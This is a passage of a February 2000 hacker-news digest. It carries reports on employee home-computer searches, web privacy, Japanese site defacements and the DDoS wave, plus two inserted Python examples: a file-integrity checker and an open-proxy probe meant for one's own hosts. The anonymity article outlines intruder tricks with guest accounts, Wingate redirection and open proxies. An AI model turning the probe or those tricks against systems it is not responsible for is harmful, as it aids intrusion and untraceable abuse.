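An added example illustrating measure 9; it is written here and is not tripwire or any other tool the guide names. A baseline of SHA-256 digests of the trusted files is written to a separate store, and a later run reports which files changed, appeared or vanished. The directory layout and file contents are constructed, and two temporary directories stand in for the system and for the removable media the guide says should hold the checksums.

```python
"""Baseline-and-verify cryptographic checking of trusted files.

Added example for measure 9 of the guide; not tripwire or any tool it
names. The baseline is a JSON map of relative path -> SHA-256 digest. In
real use it must be written somewhere the attacker cannot modify
(removable or remote media, as the guide recommends); here a second
temporary directory plays that role.
"""
import hashlib
import json
import os
import tempfile


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries do not fill RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Digest every regular file under root, keyed by path relative to root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue          # record the link's target file, not the link
            baseline[os.path.relpath(full, root)] = file_digest(full)
    return baseline


def save_baseline(baseline, dest):
    with open(dest, "w") as fh:
        json.dump(baseline, fh, indent=1, sort_keys=True)


def load_baseline(src):
    with open(src) as fh:
        return json.load(fh)


def verify(root, baseline):
    """Compare the tree under root against a trusted baseline."""
    current = build_baseline(root)
    return {
        "changed": sorted(p for p in baseline
                          if p in current and current[p] != baseline[p]),
        "added":   sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: baseline a small tree, then tamper with it."""
    with tempfile.TemporaryDirectory() as root, \
            tempfile.TemporaryDirectory() as media:
        _write(os.path.join(root, "sbin", "inetd"), b"original inetd (constructed)")
        _write(os.path.join(root, "etc", "passwd"), b"root:x:0:0::/root:/bin/sh\n")
        store = os.path.join(media, "baseline.json")
        save_baseline(build_baseline(root), store)

        # Simulate a compromise: a replaced binary, a dropped flood agent
        # binary, and a deleted file.
        _write(os.path.join(root, "sbin", "inetd"), b"replaced inetd (constructed)")
        _write(os.path.join(root, "sbin", "agent"), b"flood agent (constructed)")
        os.remove(os.path.join(root, "etc", "passwd"))

        return verify(root, load_baseline(store))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```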
10) During ongoing attacks: shut down your systems immediately and investigate

If you detect an attack emerging from your networks or hosts, or if you are being contacted because of this, you must immediately shut down your systems, or at least disconnect any of the systems from any network. If such attacks are being run on your hosts, it means that the attacker has almost-full control of the machines. They should be analyzed, and then reinstalled. You are also encouraged to contact security organisations, or emergency response teams. CERT (www.cert.org) or SANS (www.sans.org) are some places where you can always request assistance after a compromise. Also keep in mind that providing these organisations the data from your compromised machine(s) left by the attacker is important, because it will help them tracking down the origin of the attacks.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.1

iQEVAwUBOKQY5rdkBvUb0vPhAQHkyQf9GQlwQWfJTy3QSXobwijbF+fpuUt5TOwS
6kz8JkdMpCz3hyrVNSuixvR9Z7RTfriHTn6Mk6j2EtXBtcvqkxZfP6Gh4k+PlnLK
YYF0fCgT9tK62SqOrZS1fvSSDGS+s/k6hys2tb3vrVhkappTi8eynihLe6v6BnL2
/cAuck4ACGruaLxqwMJu16tY83OsiTV/StAVPivQpaBz1KeWN4MxJc568/Y/wUsx
xfwjgncNflYCsMnGEMaVuPYeaPkeNXBn2NtwTKN3EVcga4/BgqVo1VrfxBinBNEt
AZBpMk16Gql82BmXTaFuLnYxJ7TLiHZVhiq6l6DYwws+MjpjT5IiDw==
=g2Lj
-----END PGP SIGNATURE-----

@HWA

118.0 HNN: Feb 9th; Court Authorizes Home Computer Search
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Mike

Northwest Airlines has received permission from a Federal Court to search the home computers of a dozen flight attendants. The search would look for evidence, incriminating emails or other documents. It is believed that the employees helped to organize a sickout at the airline. The search is currently on hold pending a possible settlement of the airline's lawsuit against the flight attendants union.
Scary quote of the day:

"Business speech is not subject to the same protections as political speech. You can't say whatever you want about a company."
- John Roberts, Minneapolis Attorney

The Star Tribune
http://www.startribune.com/viewers/qview/cgi/qview.cgi?template=biz_a_cache&slug=priv0208

Court authorizes search of Northwest employees' home computers

Eric Wieffering and Tony Kennedy
Star Tribune
Tuesday, February 8, 2000

Northwest Airlines last week began court-authorized searches of the home computers of between 10 and 20 flight attendants, looking for private e-mail and other evidence that the employees helped to organize a sickout at the airline over the New Year's holiday.

The search has since been suspended pending a temporary settlement of the airline's lawsuit against Teamsters Local 2000, the union representing 11,000 flight attendants.

But privacy advocates and attorneys not involved with the case say Northwest's action may embolden other companies to more aggressively monitor what employees say and do online from their home computers.

"If Northwest succeeds in gaining access to the hard drives of the home computers of its employees, it will certainly put a chill on the uses employees everywhere make of their home computers," said Beth Givens, director of the Privacy Rights Clearinghouse in San Diego.

Northwest's action comes at a time when bills to protect individual privacy have been introduced at the state and national level. In addition, an increasing number of employees are learning, to their dismay, that companies have the right to monitor their online activities at work. Last month, for example, the New York Times fired 23 employees for sharing bawdy e-mail messages.

Northwest defended the search, noting that a federal court had authorized it.

"In the age we live in, the normal course of discovery includes taking depositions, producing documents and these days more than ever looking into the content of computers," said Jon Austin, a spokesman for Northwest. "So many documents and communications these days are purely electronic in nature," Austin said.

But companies have rarely sought to search the home computers of their employees. In the past, most such searches usually have been limited to cases involving workers who've been accused of stealing company files, passing on trade secrets to competitors or using insider information to profit on the trading of company stock.

Nor is all speech on the Internet protected by the First Amendment. Increasingly, courts have been willing to help companies crack down on so-called "cybersmearing" -- bad-mouthing companies or their management online.

"Business speech is not subject to the same protections as political speech," said John Roberts, a Minneapolis attorney who specializes in cyberlaw. "You can't say whatever you want about a company."

The get-tough strategy is a new one for Northwest, too. In the spring of 1998, the company's mechanics, frustrated by the pace of contract negotiations, began an unauthorized work slowdown that forced flight delays and hundreds of cancellations. Union leaders disclaimed any knowledge or authorization of the campaign, which employees advocated on Web sites and message boards.

Last month, however, Northwest sued the flight attendants union and some of its members, alleging they had violated federal labor laws by orchestrating a sickout. Judge Frank agreed with Northwest and issued a temporary restraining order that prohibited the union from advocating any work disruptions.
New legal ground

Still, the Northwest case appears to break new ground because, in addition to searching the office computers of union officials, Northwest got permission to search their home computers and the home computers of several rank-and-file employees, including Kevin Griffin and Ted Reeve.

The temporary settlement in the suit does not apply to Griffin and Reeve. The judge agreed to put the suit on hold as it pertains to the union and 19 individuals who are represented by the union's attorneys. But Griffin and Reeve, who are not represented by union attorneys because they are not union officers, are still subject to the company's discovery efforts and to a possible injunction against them.

"This kind of precedent could have a very chilling effect on the exercise of speech rights, and could set a very bad precedent for privacy," said Jerry Berman, executive director for the Center for Democracy and Technology, a leading privacy rights organization based in Washington, D.C.

Like most flight attendants, Griffin and Reeve do not use a computer at work. But they do operate online message boards where flight attendants have vented their frustration toward the company and the union leadership. Griffin's message board, http://www.nwaflightattendants.com, included anonymous postings calling for a sickout, but they were usually followed by urgings from Griffin that participants not advocate illegal activities.

Northwest hired two computer forensic experts from Ernst & Young to copy the hard drives of the 21 individuals named in the lawsuit. The judge limited the search to union activities relating to the sickout or e-mail to 43 individuals, well beyond the number of people named in the original lawsuit.

"This is really an extension beyond established law," said Marshall Tanick, a Minneapolis attorney who specializes in workplace and privacy issues. "How different is this from wiretapping somebody's phone?"
Personal data

Barbara Harvey, a Detroit-based attorney representing Griffin and Reeve, said the situation has created tremendous anxiety about the possible loss of "highly personal" information.

"We are trusting them [Ernst & Young] totally. We don't know them. We didn't hire them. In fact, they were hired by Northwest. But we are put into the position of having to trust them," she said.

Griffin, a veteran Northwest flight attendant based in Honolulu, surrendered his Packard Bell desktop and Fujitsu laptop at the Ernst & Young office in Honolulu. He was met there by two forensic examiners who flew to Honolulu from Washington, D.C., and Texas.

"I didn't think they had the right to come and get your home computer," he said.

The threat of a court-authorized search of home computers has already had one measurable impact: Postings to a rank-and-file Web site that was openly critical of both union management and the company have slowed to a trickle.

"If you're Northwest Airlines, you're probably smiling about that," said Paul Levy, a lawyer for Ralph Nader's Public Citizen Litigation Group, which also represents Griffin and Reeve.

Northwest might not be the only party pleased to see the Web site go quiet. Griffin's Web site and an organized e-mail campaign were instrumental in rallying opposition that defeated a tentative contract agreement that was reached last June and endorsed by the union's top leaders, including Teamsters General President James Hoffa.

Asked why the union didn't fight harder against the effort to search employees' home computers, Billie Davenport, president of Teamsters Local 2000, said the union complied with the discovery request because it felt it had nothing to hide.

'Was enough protection'

"We had voiced concern over people's privacy. There was an invasion-of-privacy issue," Davenport said. "But we believe there was enough privacy protection."
She said Ernst & Young's computer forensic examiners spent two full days in the union's offices last week, copying hard drives.

Griffin said his Web site has had more traffic than ever in the past month, but far fewer postings from visitors. Of those who aren't afraid to comment in the open forum section of the Web site, a much smaller percentage of the writers are identifying themselves, Griffin said.

"It's like they are running scared, with good reason," Griffin said.

@HWA

119.0 HNN: Feb 9th; MPAA Makes Deceptive Demands
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lance Link

Not content with restraining orders against named defendants obtained through lawsuits filed by the DVDCCA and the "big 8", the MPAA has now started sending its own cease-and-desist letters to people who aren't even covered by the court rulings. Peter Junger, a law professor at Case Western University, picks apart an MPAA letter sent to John Young, maintainer of the superb cryptome.org archives.

MPAA Letter
http://cryptome.org/dvd-mpaa-ccd.htm

Junger's Analysis
http://www.cs.ucl.ac.uk/staff/I.Brown/archives/ukcrypto/1199-0100/msg00639.html

@HWA

120.0 HNN: Feb 9th; Medical Sites Give Out Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

Researchers at the Health Privacy Project at Georgetown University have released a study that shows that most medical web sites share surfers' collected data with other companies. These web sites have privacy policies clearly posted; however, the sites are not following their own policies.

Fairfax IT
http://it.fairfax.com.au/e-commerce/20000208/A4140-2000Feb7.html

Fears for security on medical websites

Tuesday 8 February 2000

MEDICAL Web sites say they protect the privacy of visitors but often share the information they collect with other companies, a new study has found.
That means a visitor seeking information on, say, erectile dysfunction might unknowingly be alerting online marketers to his condition.

"We found that almost across the board, the privacy practices did not match the policies," said Janlori Goldman of the Health Privacy Project at Georgetown University, who conducted the research that went into the report released at an e-Health ethics summit of large online health information providers.

The 21 leading health sites reviewed appeared to understand the depth of consumer concerns about privacy, Goldman said, noting that they prominently sported privacy policies. But the companies weren't following through, he said. "They're giving people a false sense of confidence and a false sense of trust."

Consumers are turning to the Internet for medical information in record numbers, but a recent survey shows that privacy remains a strong concern. The poll, conducted for the California HealthCare Foundation, found that 75 per cent of people were concerned about health websites passing on personal data without permission and 17 per cent said they didn't go online for such information because of privacy concerns.

The report compared consumer health care sites on the Internet to gawky adolescents - with plenty of abilities but little self-control.

WASHINGTON POST

@HWA

121.0 HNN: Feb 9th; FTC Investigates Amazon Subsidiary on use of Customer Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by janoVd

The Federal Trade Commission has begun an investigation into Alexa Internet, a subsidiary of Amazon.com, concerning the company's use of private customer data. Alexa Internet and its software tracks where users go on the World Wide Web to provide related Web links and other data.
The informal FTC investigation into Alexa has come after charges that the company's software secretly intercepts personal data and sends that information to third parties, including Alexa's parent company, Amazon.com.

Associated Press - via Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500165488-500210086-500972125-0,00.html

Amazon.com subsidiary target of FTC probe, two lawsuits

Copyright © 2000 Nando Media
Copyright © 2000 Associated Press

By MICHAEL J. MARTINEZ

SEATTLE (February 9, 2000 1:51 a.m. EST http://www.nandotimes.com) - Alexa Internet, a subsidiary of online retail giant Amazon.com, and its software are the subject of an "informal" investigation by the Federal Trade Commission, according to a document filed this week with the U.S. Securities and Exchange Commission.

Amazon.com Inc. also said a pair of lawsuits filed against Alexa over use of private customer data are without merit.

Alexa's software, which is downloaded and installed on Web browsers like Netscape's Navigator and Microsoft's Internet Explorer, tracks where users go on the World Wide Web in order to provide related Web links and other data.

The two lawsuits mentioned in the SEC filing made Monday allege that Alexa's software secretly intercepts personal data and sends that information to third parties, including Alexa's parent company, Amazon.com.

"We are cooperating completely with the FTC on an informal, voluntary basis," said Alexa spokeswoman Dia Cheney. "As for the lawsuits, we believe the claims have no merit."

The FTC would not comment on its investigation.

Computer security consultant Richard Smith, who found the possible privacy problems in Alexa's software, said the privacy concern is in the way Alexa tracks Web pages in order to provide related links. The system records the entire address of each Web page. On some Web sites, those addresses could contain customer data.

"Some (Web addresses) may contain personal information such as mailing addresses or customer account numbers," the Brookline, Mass.-based Smith said. "It's conceivable that someone like Alexa could tie it all together with your surfing patterns and create a profile."

The lawsuits allege that the San Francisco-based Alexa is doing that - combining information gleaned from Web addresses with Amazon.com's customer accounts. Both companies deny the accusations. Alexa would not identify where the suits were filed.

Cheney noted that Web usage patterns and customers' data are stored in separate databases and are not linked. Both Amazon and Alexa said Tuesday that personal data that Alexa gathers remains on Alexa's databases and is not made available to Amazon.

Amazon.com has a service it calls "zBubbles," which offers Alexa users the ability to buy certain products based on Internet sites they visit. For example, someone visiting a site about a handheld computer might click on a zBubble to get more information on how to buy the device from Amazon. However, the zBubbles do not access Amazon.com accounts or take such information from the users' computer, according to the company.

"This is not transactional information," said Amazon spokesman Bill Curry. "This is a service that Alexa has on its product. It doesn't funnel into us."

@HWA

122.0 HNN: Feb 9th; Sys Admins Possibly At Fault in Japanese Defacements
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

Japanese officials are digging deeper into the investigation of the recent defacements of several government web sites. Observers have asked the question of whether the system administrators lived up to their obligations as operators of Web site servers.
Daily Yomiuri
http://www.yomiuri.co.jp/newse/0208cr21.htm

Sites hacked with IDs, passwords

Akiko Kasama and Masato Takahashi
Yomiuri Shimbun Staff Writers

The hackers behind a recent series of invasions of government-run Web sites may have gained access to the sites by stealing the user names and passwords belonging to the engineers operating the systems, according to investigation sources.

The hackers may have replaced the user names and passwords with new ones after illegally entering computer servers that operate the Web sites. The hackers are also suspected of erasing communications records--known as logs--in an attempt to remove information that could help trace them.

Currently, specialists and investigators are trying to work out how hackers gained access to the Web site servers. The sites broken into include those run by the Science and Technology Agency and the National Institute for Research and Advancement (NIRA), an affiliate of the Economic Planning Agency. The computer servers were running under two kinds of operating systems.

Investigators are increasingly convinced that the engineers managing the systems failed to properly set up the servers when they entered their user information into the systems. Observers question whether the system managers lived up to their obligations as operators of Web site servers.

System managers are in charge of running and overseeing information systems and computer networks at companies and government offices. Their status is almost godlike regarding computer security. They issue user names to other users, have the authority to decide the framework of each organization's computer security system and are able to erase logs that record the sender, time and place of origin of messages.

After the Science and Technology Agency Web site was broken into on Jan. 24 and 26, access to the site was tested using the user name and password of the official system manager.
The site, however, could not be accessed as the user name and password were not recognized after a hacker had created a new password.

After the NIRA site was broken into on Jan. 26, officials found that the hacker had impersonated a system manager using a user name and password of the hacker's own invention, as the site had not been set up to recognize only the system manager's user name and password.

The logs--the only means of tracing the hacker--were erased under the name of system managers on both sites.

Hackers broke into two kinds of operating systems in the recent cases. They usually use special hacking software to scout out bugs left during programming on the operating system and the software for creating Web sites. They then input specific commands to obtain user names and passwords.

Hackers in the recent cases might have obtained user names and passwords through uncorrected bugs. Nonetheless, the NIRA site case shows that hackers did not hesitate to take advantage of slack site management, the sources said.

Hacking into a system to obtain a user name and password involves searching for an unlocked port. Portscanning is a hacking tool that does this automatically. Portscanning was used in more than 12,000 intrusions into the National Personnel Authority and the authority's Kinki regional office sites, which store government employee exam information.

The deleted logs make tracing the hackers in the recent cases difficult. Also, as hackers usually use a number of servers to try to invade a targeted site, tracing failed hacking attempts does not help much in identifying the Web site trespassers.

If hacking routes cross national boundaries, jurisdiction and national interest issues also come into play. Although investigators traced illegal entries to the sites of The Asahi Shimbun and The Mainichi Shimbun to a South Korean provider, they were unable to get any further leads.
The series of hacking cases has prompted several Internet security companies to begin offering instruction on security measures and to put antihacking goods on the market.

Asgent Inc., a security software company based in Chuo Ward, Tokyo, will hold a free seminar on Feb. 16 and 17 targeting company computer system managers and focusing on the skills needed to prevent hacking and transform the contents of hacked Web sites. For more information, call Asgent at (03)5643-2561.

The Japanese unit of Network Associates Inc., based in Minato Ward, Tokyo, has started distributing free samples of CyberCop Monitor, its software for detecting illegal Web site access in real time. The samples will be sent out for free until the end of March to those who complete the application form on the company's Web site at http://www.nai.com/japan.

@HWA

123.0 HNN: Feb 9th; Anonymity and Tracking of the Malicious Intruder
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Apocalyse Dow

Malicious intruders still use temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts to roam unfettered through the internet. One would think that some of these old holes would be patched by now.

InfoWorld
http://www.idg.net/go.cgi?id=221983

January 18, 1999

Tricks of the trade obscure hacker tracks and make anonymity easily attainable

Ever wonder how hackers can spend so much time online and rarely get caught? After all, everything they do on the Internet should be logged, right? Web hits, FTP sessions, Telnet connections, newsgroup postings, burps, and coughs should all be traceable, right? Then how do they pillage and plunder with such ease?

In the good old days, compromising university or government accounts and using them to bounce around the Internet was widespread. Hackers still use these techniques, but they cover their tracks.
Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree.

Hackers can become invisible on the Internet by obtaining a test account from an ISP. A hacker can call a small ISP, profess interest, and open a guest account for a couple of weeks by giving false information. Then, using Telnet, the unwanted guest can connect to any other compromised account.

University computers are notorious for their easy accessibility to the public. Hackers can take advantage of the lack of monitoring to store the majority of their scripts and tools on the university system. And many universities give out free shell or Internet accounts to "students" supplying little more than a valid name and student registration number.

From there they can exploit old Wingate servers (www.wingate.com) that allow Telnet redirection by default. Discovered in early 1998, this bug permits unfettered Telnet access to anyone on the Internet through a Wingate proxy server. The bug has been fixed, but many sites have not yet applied the fix. Scanning a list of Wingate servers discovered at a popular hacker Web site, we found at least five (out of 127) machines still vulnerable to this bug. If you use Wingate, be sure to download Version 3.0, which fixes this and other problems.

Anonymous surfing

Proxy servers let small organizations protect their internal systems. But an improperly configured system can be vulnerable. Be sure to scan the external interface of your proxy servers. Check for open ports, especially ports 80 (unless you are Web publishing), 3128, 8080, and 10080. Out of 282 systems we scanned, more than one half (151) provide proxy services to the world. All Internet users have to do is change proxy settings in their Web browsers to an available proxy server, and it's clear sailing.

Some Web sites offer free anonymous Web surfing, which is a boon for all of us privacy paranoids out there, but a nightmare for law enforcement.
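The article's advice to scan the external interface of your own proxy servers is easy to turn into a repeatable check. The Python below is an added example, not code from InfoWorld or from any proxy vendor: probe_port() connects to one of the ports named above, sends the absolute-URI GET a browser sends to a proxy, and classify_response() decides whether the box relayed the request to a third party, refused, or just served its own page. An open port alone isn't the finding; a port that fetches an outside URL for an anonymous client is. demo() runs the probe against two in-process stand-in servers (one relays, one refuses) and one closed port so it runs offline; the stand-ins, the marker string and the target URL are constructed assumptions.

```python
"""Open-proxy check for a host's external interface (added example)."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

PROXY_PORTS = (80, 3128, 8080, 10080)  # ports the article says to check
PROBE_MARK = "open-proxy-probe-7f3a"   # assumed: a page you control returns this string


def classify_response(raw):
    """open-proxy / proxy-refused / served-locally / other-NNN / not-http."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return "not-http"
    code = parts[1].decode("ascii", "replace")
    if code == "200" and PROBE_MARK.encode() in body:
        return "open-proxy"      # it fetched our outside target: anyone can use it
    if code in ("403", "407"):
        return "proxy-refused"   # proxying exists but is restricted or authenticated
    if code == "200":
        return "served-locally"  # answered with its own content, did not relay
    return "other-" + code


def probe_port(host, port, target_url, timeout=3.0):
    """Send 'GET http://target/ HTTP/1.1' to host:port and classify the reply."""
    target_host = target_url.split("/")[2]
    req = ("GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n"
           % (target_url, target_host)).encode()
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(req)
            while True:
                c = s.recv(4096)
                if not c:
                    break
                chunks.append(c)
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "timeout"
    except OSError:
        return "error"
    return classify_response(b"".join(chunks))


def scan_proxy(host, target_url, ports=PROXY_PORTS):
    """Probe every candidate proxy port on a host; returns {port: classification}."""
    return {p: probe_port(host, p, target_url) for p in ports}


class _StandInProxy(BaseHTTPRequestHandler):
    """Constructed stand-in: acts like an open relay or a refusing proxy."""
    open_relay = True

    def do_GET(self):
        if self.path.startswith("http://") and self.open_relay:
            code, body = 200, ("<html>%s</html>" % PROBE_MARK).encode()
        elif self.path.startswith("http://"):
            code, body = 403, b"Forbidden"
        else:
            code, body = 200, b"local page"
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def _start_stand_in(open_relay):
    handler = type("Handler", (_StandInProxy,), {"open_relay": open_relay})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def _unused_port():
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Offline run: open relay, restricted proxy and a closed port on 127.0.0.1."""
    target = "http://probe.example/"  # assumed: host you control that echoes PROBE_MARK
    relay, strict = _start_stand_in(True), _start_stand_in(False)
    try:
        return {"relay": probe_port("127.0.0.1", relay.server_port, target),
                "strict": probe_port("127.0.0.1", strict.server_port, target),
                "closed": probe_port("127.0.0.1", _unused_port(), target)}
    finally:
        for srv in (relay, strict):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    print(demo())
```

Run scan_proxy() against your own proxy's public address from outside your network, with target_url pointing at a page you control; a 'served-locally' on port 80 is just your web server, a 'proxy-refused' is a proxy that is at least checking who asks, and an 'open-proxy' is the case the article counts 151 of. Only probe hosts you are responsible for.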
Both CyberArmy (www.cyberarmy.com) and Anonymizer (www.anonymizer.com) offer free, albeit slow, anonymous Web surfing. Connecting to a Web page through their free services will mask your identity. Connecting through Anonymizer's ISP you get the following identity:

Connect from sol.infonex.com [209.75.196.2] (Mozilla /4.5 [en] (TuringOS; Turing Machine; 0.0))logged.

And from CyberArmy's redirector server you get this identity:

Connect from s214-50.9natmp [216.22.214.50] (Mozilla/4.01 (compatible; NORAD National Defence Network))logged.

TuringOS and NORAD National Defence are spoofed origins that mask the originating system.

Lucent also has a proxy server meant to protect your privacy (www.lpwa.com). Like the others, the Lucent Personalized Web Assistant can make you anonymous by tunneling all of your Web traffic through its proxy server. The only difference with Lucent is you must provide your e-mail address to sign in.

Anonymous service providers such as Anonymizer and Lucent have the right intentions -- protecting your privacy -- but like any umbrella they can be abused. Services such as these can be a hacker's dream. Anonymizer offers Internet security and privacy for corporate customers and individuals, and effectively makes them invisible. They don't store cookies, they block Java and JavaScript access, and they remove all identifier strings.

To its credit, Anonymizer severely limits to whom they give shell accounts. But at $7 a month, anyone with a good story should be able to obtain one. They keep logs for 48 hours but don't record the source IP address. To guard against abuse, Anonymizer will shut down service to a particular Web site if abuse is reported. But with no source IP logging, it must shut down service to that site for all customers.

Privacy cheerleading

Don't get us wrong, we are the first to jump on the privacy bandwagon whenever it rolls by, but at what cost?
Even if all of the software bugs contributing to anonymous connections are fixed, more and more ISPs will inevitably offer anonymous connectivity. How will you defend your site against the possible onslaught of phantom hack attempts? Will logged IP addresses quickly turn into ghosts offering little more than a place to begin? Let us know at security_watch@infoworld.com.

@HWA

124.0 HNN: Feb 10th; E-Trade, LA Times, Datek, ZD-Net Join List of Sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

Web Sites around the net are bracing for more attacks today as such major companies as E-Trade, LA Times, Datek, and ZD-Net recover from massive denial of service attacks. There are lots of rumors flying around the net right now. Some are pretty far fetched but others are more believable. One such rumor is that the packets that have been used to flood at least one of the sites may have contained content: A source close to HNN says the content includes "Various references to Mixter, greets to hacker groups, etc. Several references to the Internet becoming a 'whorehouse of E-commerce'." Of course at this time none of this is confirmed.

Law enforcement agencies are working overtime attempting to track down the perpetrator(s). Some sources indicate that they may be close to an arrest while others still say they have little to go on.

What is surprising is that some companies are not admitting that they were hit by this attack. Microsoft has admitted that a partner was hit but they would not identify which one. A Lycos statement said that they already take 'extensive precautions' and declined further details. Companies need to realize that clamming up and closing the doors will not prevent this sort of thing from happening again. Only through communication and the sharing and pooling of information will a solution, and the attacker(s), be found.
The Industry Standard
http://www.thestandard.com/article/display/0,1151,9615,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2435609,00.html

Smart Money
http://www.smartmoney.com/smt/markets/news/index.cfm?story=200002092

Wired
http://www.wired.com/news/business/0,1367,34228,00.html

ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/cyberchat0209.html

Bloomberg
http://quote.bloomberg.com/fgcgi.cgi?ptitle=Technology%20News&s1=blk&tp=ad_topright_tech&T=markets_fgcgi_content99.ht&s2=blk&bt=ad_bottom_tech&s=d800d17c2c921d2af0f66e0bc647be53

Fox News
http://www.foxnews.com/vtech/020900/hack.sml

CNN
http://www.cnn.com/2000/TECH/computing/02/09/hackers29.a.tm/index.html

Industry Standard: February 09, 2000

Web Hacks: Day Three
By Polly Sprenger

For the third day in a row, major Web sites were hit by denial-of-service attacks emanating from an unknown server by an unknown assailant. E-Trade and ZDNet joined the growing list of downed sites early Wednesday morning. The Federal Bureau of Investigation has scheduled a press conference for mid-morning Wednesday to review the damage caused and update the public about their investigation. Meanwhile, the much-publicized hacker underground is searching its ranks for the perpetrator.

Wednesday's shutdowns follow the brief closure of Yahoo (YHOO) on Monday, and Amazon.com (AMZN), eBay (EBAY), CNN.com and Buy.com on Tuesday. Denial-of-service shutdowns are fairly simple to pull off; perpetrators simply flood a recipient Web site with requests for data, causing the site's servers to overload.

All of the companies targeted were anxious to tell the public that although their site had gone down, there was no risk that sensitive information had been or would be compromised. "Please understand that this is strictly a 'denial of service' attack," eBay told its users. "This has NOT and does NOT jeopardize data, such as credit card information or auction information."
While the sites wage a public relations campaign deriding hackers and defending the security of their systems, some of the numerous – and now famous – hacker groups are busy defending themselves as well.

"That wasn't a hack, it was vandalism," says Chris Tucker, a longtime member of the hacker group Cult of the Dead Cow. "They're not hackers, they're vandals. DoS attacks are nothing new, really. In this case, they were coordinated against big-name sites and got some press attention."

Organizations like Tucker's and others worry that anti-hacker paranoia will turn public perception against them. "We are currently building a consensus among other groups to address the media's misuse of the term 'hacker' as a community [and] to defend our good name," said "Macki," a representative of 2600, an organization which follows issues related to computer security. "We're working on a more in-depth commentary on this subject and talking with other groups about addressing the issue together."

Other hackers agreed, adding that the media should focus on the sites that are getting attacked, not the hacker underground. "This is a wakeup call for people to show some responsibility before they hook up servers to the Internet," says "Simple Nomad," another hacker who lives his corporate life at a mainstream security company.

But aside from the arguments over what does and does not constitute a hacker, the underground and the law-enforcement bodies agree on one thing: Tracking down the perpetrator of this week's actions could be a logistical nightmare.

The perpetrator might be enhancing his street cred by continuing to bring down sites, but he's not improving the odds of eluding law-enforcement officials. The acclaimed "Weld Pond," a hacker with computer security group The L0pht, says that with each new site that goes down, the FBI gets more of the information it needs to pinpoint the source of the attacks.

"I think they've probably proved their point and it would be stupid to keep going," he said. Pond is a "white hat" hacker, meaning that he avoids criminal activity; he says he hacks because it stretches his mind and enhances his consulting abilities.

Pond explains that, while each new attack makes the search easier, "it's hard to trace these things back. When you trace a phone call, it's trivial. Tracing phone calls is built into the telephone infrastructure. There is no mechanism like that in the Internet."

The requests that are flooding servers are coming from all over the country, so tracking down the machines from which the attacks originated requires a massive coordination effort. Different Internet service providers have to communicate with one another to pinpoint a single computer. And even when the machine is found, it seems unlikely that the vandal will be seated at a desk, typing away, waiting to be led off in handcuffs.

"They will eventually find the machine that's doing it," says Pond. "But as for the person..."

"They can only hope that the people who did this are complete idiots," agrees Simple Nomad. "If they were smart, the packets sent to Yahoo were forged. All that can be done is to slowly move up the chain, ignoring where the packet says it is coming from, and look to see where the traffic itself is coming from. Next, you find the compromised hosts, and hope that there are clues in logs there. These hosts were remotely controlled via a client piece of software – they may be able to trace this back, but the client software is probably on yet another compromised host. Yuck."

Meanwhile, the latest foray by the mainstream media into hackerdom has elicited blase reactions from the underground. "I am being swamped with talking-head requests," sighs Space Rogue, editor of the Hacker News Network.

Corrections: An earlier version of this story included Datek among the attacked sites.
In fact, a Datek vendor had experienced a temporary router problem that was not related to the hacker attacks.

-=-

Smart Money; February 9, 2000

Inside the Hack Attack on the Web
By Cintra Scott and Ian Mount

IF YOU CAN read this, SmartMoney.com is lucky.

